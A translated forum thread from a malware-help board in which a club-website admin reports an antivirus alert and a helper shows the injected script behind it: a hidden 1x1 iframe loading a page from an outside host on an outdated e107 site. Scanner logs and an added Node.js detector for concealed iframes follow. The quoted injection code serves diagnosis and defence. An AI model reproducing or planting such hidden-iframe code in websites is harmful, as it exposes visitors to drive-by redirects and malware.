Pests of All Kinds and How to Combat Them: Java Script Virus JS/EXP.Redir.EL.7

11.06.2013, 09:23   #1
crucru1995

Hello everyone,

since yesterday I have had the problem that I can no longer get to our homepage (www.sportschuetzen-oberhausen-1995ev.de). I am the admin there and permanently logged in.

I am shown this notice:

In den HTTP-Daten der angeforderten Seite wurde ein Virus oder ein unerwünschtes Programm gefunden.

Angeforderte URL: Home - Sportschützen Oberhausen 1995 e.v.
Information: Enthält Erkennungsmuster des Java-Scriptvirus JS/EXP.Redir.EL.7

I uninstalled Java on my main computer on suspicion, which did not fix the problem. Even from the laptop I get this notice, but the page is still displayed to me as a guest.

I ran a scan with Avira, with the result of three detections, see attachment!

I have also already written to our provider, 1blu, but am still waiting for a reply.

Please understand that I know very little about IT and cannot understand or immediately implement everything, but I still hope for help.

Best regards
Christine

11.06.2013, 09:37   #2
t'john
/// Helper Team

Create the Antivir log like this: http://www.trojaner-board.de/125889-...en-posten.html

11.06.2013, 10:02   #3
crucru1995

Hello t'john,

I hope I understood you correctly.

As an attachment.

Regards
Christine

11.06.2013, 10:55   #4
t'john
/// Helper Team

Do you use a CMS for the site?

An iframe is being injected:

Code:
 function zzzfff() {
     var zeaqn = document.createElement('iframe');

     zeaqn.src = 'hxxp://monika-linsz.de/count.php';
     zeaqn.style.position = 'absolute';
     zeaqn.style.border = '0';
     zeaqn.style.height = '1px';
     zeaqn.style.width = '1px';
     zeaqn.style.left = '1px';
     zeaqn.style.top = '1px';

     if (!document.getElementById('zeaqn')) {
         document.write('<div id=\'zeaqn\'></div>');
         document.getElementById('zeaqn').appendChild(zeaqn);
         
Code:
<link rel="stylesheet" type="text/css" href="/e107_plugins/log/log.php?lv=cmVmZXJlcj0mY29sb3VyPTI0JmVzZWxmPWh0dHA6Ly93d3cuc3BvcnRzY2h1ZXR6ZW4tb2JlcmhhdXNlbi0xOTk1ZXYuZGUvcGFnZS5waHA/NiZyZXM9MTE3Nng4ODU=">
         
__________________
Regards, t'john
Support the TB
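
The injected snippet in post #4 builds an iframe in script, shrinks it to 1x1 px and attaches it with document.write. As an added example (not part of the thread and not code from any tool mentioned in it), this Node.js check flags that pattern in a page's source; the function names, the sample page and the hosts tracker.example.invalid and www.example.org are constructed for illustration, and the matching is a heuristic over plain, unobfuscated assignments.

```javascript
'use strict';
// Added example (not from the thread): flag inline scripts that build a
// concealed iframe, the pattern shown in the injected snippet in post #4.

// Constructed sample page. tracker.example.invalid and www.example.org are
// placeholders; the second script is a legitimate, visible same-site embed.
const SAMPLE_PAGE = `
<html><body>
<script>
function zzzfff() {
  var zeaqn = document.createElement('iframe');
  zeaqn.src = 'http://tracker.example.invalid/count.php';
  zeaqn.style.position = 'absolute';
  zeaqn.style.border = '0';
  zeaqn.style.height = '1px';
  zeaqn.style.width = '1px';
  if (!document.getElementById('zeaqn')) {
    document.write('<div id=\\'zeaqn\\'></div>');
    document.getElementById('zeaqn').appendChild(zeaqn);
  }
}
zzzfff();
</script>
<script>
var player = document.createElement("iframe");
player.src = "http://www.example.org/media/player.html";
player.style.width = "560px";
player.style.height = "315px";
document.body.appendChild(player);
</script>
</body></html>`;

// Bodies of all inline <script> blocks (those without a src= attribute).
function inlineScripts(html) {
  const out = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (!/\bsrc\s*=/i.test(m[1])) out.push(m[2]);
  }
  return out;
}

// Host of a URL, tolerating the defanged "hxxp" spelling used in reports.
function hostOf(url) {
  try {
    return new URL(url.replace(/^hxxp/i, 'http')).hostname.toLowerCase();
  } catch (e) {
    return null; // relative or malformed URL
  }
}

// True when host is the site itself or one of its subdomains.
function sameSite(host, siteHost) {
  const strip = (h) => h.toLowerCase().replace(/^www\./, '');
  const a = strip(host);
  const b = strip(siteHost);
  return a === b || a.endsWith('.' + b);
}

// Numeric value of "1px" or "1"; null for anything else (%, em, empty).
function pixels(value) {
  const m = /^(\d+(?:\.\d+)?)(?:px)?$/.exec(value.trim());
  return m ? parseFloat(m[1]) : null;
}

// Find variables assigned document.createElement('iframe'), collect their
// string property assignments, and report those that are concealed.
function analyzeScript(code, siteHost) {
  const findings = [];
  const decl = /\b([A-Za-z_]\w*)\s*=\s*document\.createElement\(\s*['"]iframe['"]\s*\)/gi;
  let d;
  while ((d = decl.exec(code)) !== null) {
    const props = {};
    const assign = new RegExp(
      '\\b' + d[1] + '\\.(?:style\\.)?(\\w+)\\s*=\\s*([\'"])(.*?)\\2', 'g');
    let a;
    while ((a = assign.exec(code)) !== null) props[a[1].toLowerCase()] = a[3];

    const reasons = [];
    const w = pixels(props.width || '');
    const h = pixels(props.height || '');
    if (w !== null && h !== null && w <= 2 && h <= 2) reasons.push(`${w}x${h} px`);
    if (props.display === 'none' || props.visibility === 'hidden') {
      reasons.push('hidden by style');
    }
    if (reasons.length === 0 || !props.src) continue; // visible, or no source set
    if (/document\.write(?:ln)?\s*\(/.test(code)) reasons.push('uses document.write');
    const host = hostOf(props.src);
    findings.push({
      variable: d[1], src: props.src, host,
      external: host !== null && !sameSite(host, siteHost), reasons,
    });
  }
  return findings;
}

// Scan a whole page; siteHost is the host the page is served from.
function scanPage(html, siteHost) {
  return inlineScripts(html).flatMap((code) => analyzeScript(code, siteHost));
}

console.log(JSON.stringify(scanPage(SAMPLE_PAGE, 'www.example.org'), null, 2));
```

A hit with `external: true` on a page nobody edited is a reason to compare the CMS files on the server against a clean copy of the same release.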

11.06.2013, 11:42   #5
crucru1995

I'm afraid the term CMS means nothing to me, and neither does iFrame.

I created the homepage with e107.

Maybe that helps you.

Regards
Christine


11.06.2013, 15:19   #6
t'john
/// Helper Team

e107 is a CMS.

You apparently did not maintain/update it, so third parties were able to inject code.

You will have to set up the CMS from scratch.

11.06.2013, 18:25   #7
crucru1995

Hello t'john,

if I understand this correctly now, I have to set up the computer again????

I'm sorry, but please not again; we only had a virus on the homepage in April, a really nasty trojan, and I only got rid of it by setting up the homepage again and then setting up the computer again.

Can you please tell me how I can maintain or update something like this in the future?

Many thanks
Regards
Christine

12.06.2013, 09:15   #8
t'john
/// Helper Team

Not your computer!

The server the homepage is on!!!

Your computer probably has nothing!

Please download Malwarebytes Anti-Rootkit and save it to your desktop.
  • Please start mbar.exe.
  • Follow the instructions on your screen according to the Malwarebytes Anti-Rootkit guide.
  • Be sure to update the database and allow the tool to scan your system.
  • Click the CleanUp button and allow the restart.
  • During the restart MBAR will remove the objects found, so be patient.
  • After the restart, start mbar.exe again.
  • If anything is found again, repeat the CleanUp process.
The tool will create a log file ( mbar-log-<year-month-day>.txt ) in the created folder. Please post it here.

Do not start any other file in this folder without instructions from a helper
__________________
Regards, t'john

12.06.2013, 09:55   #9
crucru1995

Sorry that I misinterpreted the bit about setting up again and the link.

I followed the instructions:

Malwarebytes Anti-Rootkit BETA 1.06.0.1003
www.malwarebytes.org

Database version: v2013.06.12.02

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 10.0.9200.16576
Crucru :: CRUCRU-PC [administrator]

12.06.2013 10:39:24
mbar-log-2013-06-12 (10-39-24).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUM | P2P
Scan options disabled: Deep Anti-Rootkit Scan | PUP
Objects scanned: 230202
Time elapsed: 7 minute(s), 8 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 2
c:\Users\Crucru\AppData\Local\Temp\DM\zNQjkZSp4icZoF5\DomaIQ.exe (Adware.DomaIQ) -> Delete on reboot.
c:\Users\Crucru\AppData\Local\Temp\DM\zNQjkZSp4icZoF5\DomaIQ10.exe (Adware.DomaIQ) -> Delete on reboot.

Physical Sectors Detected: 0
(No malicious items detected)

(end)


And I have also copied the log from Avira again, since I am now shown a different error.

Thanks

12.06.2013, 11:44   #10
t'john
/// Helper Team

No problem.

Your computer has nothing. Only adware.

Please close your protection software to avoid possible conflicts.
Please download Junkware Removal Tool to your desktop

  • Start the tool with a double-click. On Windows Vista (or later) please start it by right-clicking and choosing "Run as administrator".
  • Press any key to start the tool.
  • Depending on the system, the scan can take a while.
  • When the tool is finished, the log file (JRT.txt) is saved on the desktop and opened automatically.
  • Please post the contents of JRT.txt in your next reply.

__________________
Regards, t'john

12.06.2013, 13:18   #11
crucru1995

Here I am again... it's already a good sign that it isn't my computer.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 4.9.4 (05.06.2013:1)
OS: Windows 7 Home Premium x64
Ran by Crucru on 12.06.2013 at 13:02:41,80
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services

Successfully stopped: [Service] sprotection
Successfully deleted: [Service] sprotection



~~~ Registry Values

Successfully deleted: [Registry Value] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\iminent
Successfully deleted: [Registry Value] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\iminentmessenger
Successfully repaired: [Registry Value] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\\DefaultScope



~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\babylon
Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\babylontoolbar
Failed to delete: [Registry Key] HKEY_CURRENT_USER\Software\datamngr
Failed to delete: [Registry Key] HKEY_LOCAL_MACHINE\Software\datamngr
Failed to delete: [Registry Key] HKEY_CURRENT_USER\Software\datamngr_toolbar
Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\iminent
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\iminent
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Umbrella
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\appid\genericasktoolbar.dll
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\appid\iminent.webbooster.internetexplorer.dll
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\genericasktoolbar.toolbarwnd
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\genericasktoolbar.toolbarwnd.1
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.business.tinyfying.downloadargs
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.business.tinyfying.linktopromoteargs
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.business.tinyfying.rawdataargs
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.business.tinyfying.tinyurlargs
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.business.tinyfying.virallinkargs
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.clientcallback
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.contractbase
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.addtousercontentcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.checkloginstatuscommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.cleancachecommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.gameovercallback
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.getcreditcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.getinstallationcontextcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.getloginstatuscommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.getloginstatusresult
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.getvariablecommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.getvariableresult
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.installationcontextresult
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.loadcontentcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.loadcontentcommandresult
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.logincommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.loginstatuschangedcallback
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.logoutcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.mergeidentitycommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.myaccountcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.playcontentcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.postcontentcallback
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.recycleviewscommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.setvariablecommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.showbrowserwindowcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.showcontrolcentercommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.showpluginwindowcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.testcontentcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.usercontentchangedcallback
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.variablechangedcallback
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.warmupcommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.datacontracts.welcomecommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.servercommand
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.communication.serverresult
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.lightcontent
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.lighturi
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminent.mediator.mediatorserviceproxy
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminentwebbooster.activecontenthandle.1
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminentwebbooster.activecontenthandler
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminentwebbooster.browserhelperobject
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminentwebbooster.browserhelperobject.1
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminentwebbooster.scriptextender
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminentwebbooster.scriptextender.1
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminentwebbooster.tinyurlhandler
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\iminentwebbooster.tinyurlhandler.1
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\installer\features\a28b4d68debaa244eb686953b7074fef
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\installer\products\a28b4d68debaa244eb686953b7074fef
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\installer\upgradecodes\f928123a039649549966d4c29d35b1c9
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\prod.cap
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\scripthost.tool
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Classes\scripthost.tool.1
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\tracing\iminent_rasapi32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\tracing\iminent_rasmancs
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\tracing\mybabylontb_rasapi32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\tracing\mybabylontb_rasmancs
Failed to delete: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\datamngr
Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{59C0C5BD-2579-433A-BBB8-AFFD59642BAF}
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A09AB6EB-31B5-454C-97EC-9B294D92EE2A}



~~~ Files



~~~ Folders

Successfully deleted: [Folder] "C:\ProgramData\babylon"
Successfully deleted: [Folder] "C:\ProgramData\iminent"
Successfully deleted: [Folder] "C:\Users\Crucru\AppData\Roaming\babylon"
Successfully deleted: [Folder] "C:\Users\Crucru\AppData\Roaming\iminent"
Successfully deleted: [Folder] "C:\Users\Crucru\appdata\locallow\delta"
Successfully deleted: [Folder] "C:\Program Files (x86)\happylyrics"
Successfully deleted: [Folder] "C:\Program Files (x86)\iminent"
Successfully deleted: [Folder] "C:\Program Files (x86)\Common Files\umbrella"



~~~ FireFox

Successfully deleted: [File] C:\Users\Crucru\AppData\Roaming\mozilla\firefox\profiles\844091ak.default\user.js
Successfully deleted: [File] C:\Users\Crucru\AppData\Roaming\mozilla\firefox\profiles\844091ak.default\invalidprefs.js
Successfully deleted: [File] C:\Users\Crucru\AppData\Roaming\mozilla\firefox\profiles\844091ak.default\searchplugins\babylon.xml
Successfully deleted: [File] C:\Users\Crucru\AppData\Roaming\mozilla\firefox\profiles\844091ak.default\searchplugins\delta.xml
Successfully deleted: [Registry Value] HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\Extensions\\webbooster@iminent.com
Successfully deleted the following from C:\Users\Crucru\AppData\Roaming\mozilla\firefox\profiles\844091ak.default\prefs.js

user_pref("extensions.delta.admin", false);
user_pref("extensions.delta.aflt", "babsst");
user_pref("extensions.delta.appId", "{C26644C4-2A12-4CA6-8F2E-0EDE6CF018F3}");
user_pref("extensions.delta.autoRvrt", "false");
user_pref("extensions.delta.dfltLng", "en");
user_pref("extensions.delta.excTlbr", false);
user_pref("extensions.delta.ffxUnstlRst", true);
user_pref("extensions.delta.id", "ccb4af2c000000000000c860008c6cfe");
user_pref("extensions.delta.instlDay", "15832");
user_pref("extensions.delta.instlRef", "sst");
user_pref("extensions.delta.newTab", false);
user_pref("extensions.delta.prdct", "delta");
user_pref("extensions.delta.prtnrId", "delta");
user_pref("extensions.delta.rvrt", "false");
user_pref("extensions.delta.smplGrp", "none");
user_pref("extensions.delta.tlbrId", "base");
user_pref("extensions.delta.tlbrSrchUrl", "");
user_pref("extensions.delta.vrsn", "1.8.16.16");
user_pref("extensions.delta.vrsnTs", "1.8.16.1615:19:25");
user_pref("extensions.delta.vrsni", "1.8.16.16");
Emptied folder: C:\Users\Crucru\AppData\Roaming\mozilla\firefox\profiles\844091ak.default\minidumps [12 files]



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 12.06.2013 at 13:05:54,99
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

12.06.2013, 15:58   #12
t'john
/// Helper Team

ok.

Please download aswMBR.exe and save the file on your desktop.
  • Start aswMBR.exe - (aswMBR.exe guide)
    On Windows Vista (or later) please start it by right-clicking and choosing "Run as administrator".
  • The tool will ask you whether you want to scan your system with the current AVAST! virus definitions. Please answer this question with Yes. (If your firewall asks, please allow access to the Internet.)
    Downloading the definitions can take a while depending on the connection.
  • Click Scan.
  • Please wait until Scan finished successfully appears in the DOS window.
  • Press Save Log and save it on the desktop.
Post the aswMBR.txt in your next reply.

Important: Do not press any of the Fix buttons without instructions

Note: If the Scan button is hidden, close the tool and start it again. If the scan aborts and the program crashes, then let me know and select the setting (none) under AV Scan.

then:

Please download SecurityCheck and:

  • Save it on the desktop.
  • Start SecurityCheck.exe and follow the instructions in the DOS box.
  • When the scan has finished, a text document (checkup.txt) should open.
Please post the contents here.
__________________
Regards, t'john

12.06.2013, 19:07   #13
crucru1995

Hello t'john,

unfortunately there are problems with the aswMBR scan.

After it has run the scan for about 2 minutes I get an error message.

"Das Programm wird aufgrund eines Problems nicht richtig ausgeführt. Das programm wird geschlossen und Sie werden benachricht wenn eine Lösung verfügbar ist"

Even on a second and third attempt the scan aborts.

14.06.2013, 08:04   #14
t'john
/// Helper Team

Did you follow the note?
__________________
Regards, t'john

14.06.2013, 08:12   #15
crucru1995


aswMBR version 0.9.9.1771 Copyright(c) 2011 AVAST Software
Run date: 2013-06-14 09:13:01
-----------------------------
09:13:01.630 OS Version: Windows x64 6.1.7601 Service Pack 1
09:13:01.630 Number of processors: 4 586 0x2A07
09:13:01.630 ComputerName: CRUCRU-PC UserName: Crucru
09:13:04.110 Initialize success
09:13:11.973 AVAST engine defs: 13061300
09:13:16.216 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP4T0L0-8
09:13:16.216 Disk 0 Vendor: ST31000524AS JC4B Size: 953869MB BusType: 11
09:13:16.310 Disk 0 MBR read successfully
09:13:16.325 Disk 0 MBR scan
09:13:16.325 Disk 0 Windows 7 default MBR code
09:13:16.325 Disk 0 Partition 1 80 (A) 07 HPFS/NTFS NTFS 100 MB offset 2048
09:13:16.341 Disk 0 Partition 2 00 1B Hidd FAT32 NTFS 19024 MB offset 206848
09:13:16.341 Disk 0 Partition 3 00 07 HPFS/NTFS NTFS 381546 MB offset 39168000
09:13:16.388 Disk 0 Partition 4 00 07 HPFS/NTFS NTFS 553196 MB offset 820574244
09:13:16.419 Disk 0 scanning C:\windows\system32\drivers
09:13:26.684 Service scanning
09:13:42.331 Modules scanning
09:13:42.331 Disk 0 trace - called modules:
09:13:42.892 ntoskrnl.exe CLASSPNP.SYS disk.sys ataport.SYS PCIIDEX.SYS hal.dll asahci64.sys
09:13:42.892 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa8007ddc060]
09:13:42.892 3 CLASSPNP.SYS[fffff880019cf43f] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP4T0L0-8[0xfffffa800777b060]
09:13:42.908 Scan finished successfully
09:14:43.217 Disk 0 MBR has been saved successfully to "C:\Users\Crucru\Documents\MBR.dat"
09:14:43.217 The log file has been saved successfully to "C:\Users\Crucru\Documents\aswMBR.txt"


09:15:35.201 Disk 0 MBR has been saved successfully to "C:\Users\Crucru\Documents\MBR.dat"
09:15:35.201 The log file has been saved successfully to "C:\Users\Crucru\Documents\aswMBR.txt"

Results of screen317's Security Check version 0.99.64
Windows 7 Service Pack 1 x64 (UAC is enabled)
Internet Explorer 10
``````````````Antivirus/Firewall Check:``````````````
Trend Micro Titanium Internet Security
Avira Desktop
Antivirus up to date! (On Access scanning disabled!)
`````````Anti-malware/Other Utilities Check:`````````
Adobe Flash Player 11.7.700.224
Adobe Reader 10.1.7 Adobe Reader out of Date!
Mozilla Firefox (21.0)
````````Process Check: objlist.exe by Laurent````````
Avira Antivir avgnt.exe
Avira Antivir avguard.exe
Trend Micro Titanium TiMiniService.exe
Trend Micro Titanium TiResumeSrv.exe
`````````````````System Health check`````````````````
Total Fragmentation on Drive C:
````````````````````End of Log``````````````````````
